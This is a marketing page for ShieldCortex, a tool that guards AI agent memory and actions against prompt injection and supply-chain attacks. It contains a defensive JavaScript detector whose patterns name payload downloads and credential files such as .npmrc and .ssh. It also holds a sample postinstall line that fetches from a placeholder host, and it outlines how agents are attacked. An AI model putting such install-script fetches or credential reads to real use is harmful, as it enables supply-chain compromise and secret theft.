Memory Security for AI Agents

ShieldCortex helps AI agents remember useful things, stop dangerous memory from spreading, and show operators exactly what was captured, recalled, blocked, and reviewed. Start free, get a 14-day Pro trial on first install, and only add cloud when you need team visibility.

npm install -g shieldcortex
pip install shieldcortex

Available on npm and PyPI

🚀
Just Released

ShieldCortex v4.4.0

X-Ray — inspect packages, files, and plugins for hidden risk. CI/CD gating, file watch, pre-install hooks, and memory guard. Plus Dream Mode, Hybrid Recall, Dependency Scanner, and more.

X-Ray, CI/CD Gate, Memory Guard, File Watch

See It In Action

Watch ShieldCortex block a prompt injection and privilege escalation in real time.


Stop Bad Memory

Catch poisoning before it becomes future truth.

Prompt injection, hostile instructions, fragmented payloads, suspicious provenance, and leaked credentials are scanned before they land in durable agent memory.

Inspect Recall

See what the agent stored and why it ranks.

Capture, Recall, and Review turn memory into an operator workflow. Inspect stored memories, rank explanations, contradictions, duplicates, and low-trust records before they shape output.

Operator Security

Keep a human in control when agents misbehave.

Review queues, Incident Replay, Device Doctor, Verify, and Iron Dome analytics show what happened, what was blocked, what synced, and what the operator should do next.

Iron Dome (new)

The defence pipeline protects your agent's memory. Iron Dome protects your agent's actions.

$ shieldcortex iron-dome activate --profile school

Injection Scanner

40+ patterns across 8 attack categories

Action Gate

Approve, require approval, or block actions

PII Guard

Block protected data from agent output

Instruction Gateway

Only trusted channels can issue commands

Kill Switch

Trigger phrase pauses memory creation instantly

Sub-Agent Control

Restrict spawned agents' capabilities

🦞 OpenClaw Integration

Every memory your OpenClaw agent saves passes through ShieldCortex. Prompt injection, credential leaks, poisoned context — caught before it reaches storage. New: the Tool Call Interceptor actively blocks suspicious tool calls and requires operator approval before proceeding. Works as a standalone memory system or as a security layer for any memory backend.

Hook Integration

1. openclaw hooks install shieldcortex
2. openclaw plugins install @drakon-systems/shieldcortex-realtime
3. openclaw gateway restart

Hook and plugin install separately. Auto-memory is opt-in with smart deduplication.

Real-time Plugin (new)

Scans every LLM input for threats and auto-extracts memories from outputs. Fire-and-forget — never blocks your agent.

Install directly with openclaw plugins install @drakon-systems/shieldcortex-realtime or use the ShieldCortex wrapper on existing setups.

Requires OpenClaw v2026.2.15+.

Works on macOS, Linux (including headless servers), and Windows. Rolling out to a paid team? Use the install commands, activate the Team licence locally, set the Cloud API key, enable cloud sync, and run the persistent worker on always-on boxes. No separate signup is needed on the target machine.


AI Agents Have Three Security Problems

Most tools add memory. Very few make that memory trustworthy.

😵

Amnesia

Your agent forgets everything between sessions. No context. No learning. Starting from zero every time.

🎯

Memory Vulnerability

The moment you add memory, you create an attack surface. Memory poisoning. Prompt injection. Credential harvesting.

🤖

Behaviour Vulnerability

Agents can be tricked into executing harmful actions via prompt injection. No guardrails on what they do, only what they remember.

ShieldCortex = Memory + Poisoning Defence + Operator Control

Not just memory for agents. Memory security for agents.

What You Get

Full protection for free. Pro licence for custom rules. Team licence for cloud sync.

🛡️

Local Protection

npm package — free and open source

  • Memory Firewall — Block injection attacks in real time
  • Trust Scoring — Filter by source reliability
  • Anomaly Detection — Behavioural scoring over time
  • Codex MCP support — one install covers Codex CLI and the Codex VS Code extension on the same machine
  • MCP Tools — Native support for Claude Code, OpenClaw
  • Universal Memory Bridge — Guard any memory backend with the defence pipeline
  • 6-Layer Defence Pipeline — Sanitise, detect, analyse, validate, score, credential scan
  • Security Audit — A-F grading, CVE detection, CI/CD integration via GitHub Action
  • Iron Dome — Behaviour protection: injection scanning, action gating, PII guard
  • Memory Types — Typed memories: user, feedback, project, reference. Organise what your agent remembers.
  • Staleness Scoring — Age-based decay with automatic warnings on old memories. Stale data flagged, not trusted blindly.
  • LLM-Powered Reranking — Hybrid recall: embedding search + optional LLM reranker for precision retrieval.
  • Dream Mode — Background memory consolidation: merge duplicates, archive stale, detect contradictions. Like brain sleep for agents.
  • Save Filtering — Prevents saving derivable information (file paths, git refs, env vars). Only stores what matters.
  • Docker Install Safety — Auto-detects containers and prevents broken installs that damage host systems.

Context Preservation

  • Pre-Compaction Extraction — Auto-saves decisions, fixes, and learnings before context is lost
  • Session Continuity — Auto-loads project context at session start, extracts on exit
  • Salience Scoring — Prioritises what matters, lets noise decay naturally
  • Memory Consolidation — Promotes short-term to long-term memory, like brain sleep

Pro + Team

Licence key — from £29/mo

Pro Features

  • Custom Injection Patterns — Up to 50 regex rules for domain-specific threats
  • Custom Iron Dome Policies — Tailor behaviour controls to your use case
  • Audit Export — JSON/CSV export of your defence logs
  • Skill Scanner Deep Mode — Multi-file semantic analysis
  • Dependency Scanner — Detect malicious packages, typosquats, and suspicious install scripts in your project

Team Features

  • Cloud Audit Sync — Centralised logs across all devices
  • Team Management — Invite members, shared custom patterns
  • Memory Scopes — Private vs team memories for multi-agent deployments. Control who sees what.
  • Positive Feedback Capture — Cortex now captures confirmations, not just mistakes. Learn from success AND failure.

🔒 Supply Chain Protection

Your AI agent runs npm install. Who's watching?

AI coding agents execute package installs autonomously. ShieldCortex catches supply chain attacks that Snyk and Dependabot miss.

Zero-Day Detection

  • Catches attacks BEFORE they're in CVE databases
  • Blocklist of known malicious packages updated in real-time
  • Found what others missed: axios 1.14.1, plain-crypto-js, color-diff-napi

Typosquat & Script Analysis

  • Flags lookalike package names (Levenshtein distance)
  • Scans postinstall scripts for payload downloads, OS detection, credential access
  • Warns about brand-new packages with install hooks
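
The typosquat and install-script checks listed above can be sketched as follows. This is an added example, not ShieldCortex's own code: the `POPULAR` list, the `SCRIPT_RULES` patterns and the `SAMPLE` manifest are assumptions constructed for illustration.

```javascript
// Added example, not ShieldCortex code. POPULAR, SCRIPT_RULES and SAMPLE are
// assumptions constructed for illustration.
const POPULAR = ["axios", "express", "lodash", "react", "chalk"];
const HOOKS = ["preinstall", "install", "postinstall"];
const SCRIPT_RULES = [
  ["downloads payload", /\b(curl|wget)\b|https?:\/\//i],
  ["detects OS", /process\.platform|os\.platform\(\)|\buname\b/i],
  ["credential access", /\.npmrc|\.ssh\/|\.aws\/|NPM_TOKEN/i],
];
// Two-row Levenshtein edit distance (insert, delete, substitute).
function levenshtein(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = cur;
  }
  return prev[b.length];
}
// Closest well-known name within maxDist edits; null for exact or distant names.
// A swap of two adjacent letters costs 2, so maxDist below 2 misses "axois".
function typosquatOf(name, maxDist = 2) {
  if (POPULAR.includes(name)) return null;
  const near = POPULAR.map((p) => [p, levenshtein(name, p)])
    .filter(([, d]) => d <= maxDist)
    .sort((x, y) => x[1] - y[1]);
  return near.length ? near[0][0] : null;
}
// Audit one package.json manifest; publishedAt is the registry publish time.
function auditPackage(manifest, publishedAt, now = Date.now()) {
  const findings = [];
  const scripts = manifest.scripts || {};
  const target = typosquatOf(manifest.name);
  if (target) findings.push(`HIGH typosquat: "${manifest.name}" -> "${target}"`);
  const hooks = HOOKS.filter((h) => scripts[h]);
  for (const h of hooks) {
    const hits = SCRIPT_RULES.filter(([, re]) => re.test(scripts[h])).map(([label]) => label);
    if (hits.length) findings.push(`HIGH suspicious ${h}: ${hits.join(", ")}`);
  }
  const ageDays = (now - Date.parse(publishedAt)) / 86400000;
  if (hooks.length && ageDays < 7) findings.push("MEDIUM new package (< 7 days) with install script");
  return findings;
}
// Constructed sample manifest (not a real package); example.invalid never resolves.
const SAMPLE = { name: "axois", scripts: { postinstall: "uname -s && curl -fsSL https://example.invalid/p" } };
console.log(auditPackage(SAMPLE, "2024-01-05T00:00:00Z", Date.parse("2024-01-08T00:00:00Z")));
```

An edit-distance threshold of 2 also matches legitimate short names that sit close to a popular one, so findings from a check like this need an allowlist or a reviewer before anything is blocked.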
Pro

Auto-Quarantine

  • Doesn't just warn — actively removes threats
  • Moves malicious packages to quarantine with full manifest
  • shieldcortex audit --deps --auto-protect for CI/CD pipelines
terminal
$ shieldcortex audit --deps
[X] CRITICAL Known malicious: plain-crypto-js
[!] HIGH Typosquat detected: "axois" → "axios"
[!] HIGH Suspicious postinstall: downloads payload, detects OS
[~] MEDIUM New package (< 7 days) with install script
🛡️ Run with --auto-protect to quarantine threats automatically

Your Agent Never Forgets

AI agents lose context during compaction, between sessions, and when conversations get long. ShieldCortex intercepts at every point where memory is lost.

🧠

Before Compaction

Auto-extracts decisions, fixes, and learnings before they get compressed away.

🔄

Session Start

Loads your highest-priority memories automatically. No blank slate.

⚖️

Smart Priority

Salience scoring keeps architecture decisions and bug fixes; lets noise decay naturally.

💤

Consolidation

Promotes short-term to long-term memory and merges related items. Like brain sleep.

Get Started in Minutes

Choose your path.

🦞

OpenClaw Users

1. openclaw hooks install shieldcortex
   Install the session hook

2. openclaw plugins install @drakon-systems/shieldcortex-realtime
   Install the real-time plugin

3. openclaw gateway restart
   Reload OpenClaw and start protected sessions

🐍

Python (new)

1. pip install shieldcortex
   LangChain/CrewAI extras available

2. Scan content before it reaches memory
   Local scanning — no API key needed

3. Done. Works with LangChain, CrewAI, and REST APIs.

📦

Node.js

1. npm install -g shieldcortex
   Install the ShieldCortex CLI

2. shieldcortex quickstart
   Configure your agent integration

3. shieldcortex --dashboard
   View threats, audit log, and brain visualisation

Node.js 18+ or Python 3.9+ — macOS, Linux & Windows

Coming Soon

ShieldCortex X-Ray

See what your AI can't. Inspect packages, plugins, and files for hidden instructions, exfiltration paths, covert payloads, and AI-targeted exploits.

Prompt Injection, Steganography, Covert Channels, Memory Poisoning

Trust Score: 68/100. Risk: Elevated. Critical 3, Warning 5, Info 12.

Start Protecting Your Agents

Install free. Upgrade locally with a licence key.

npm install shieldcortex
pip install shieldcortex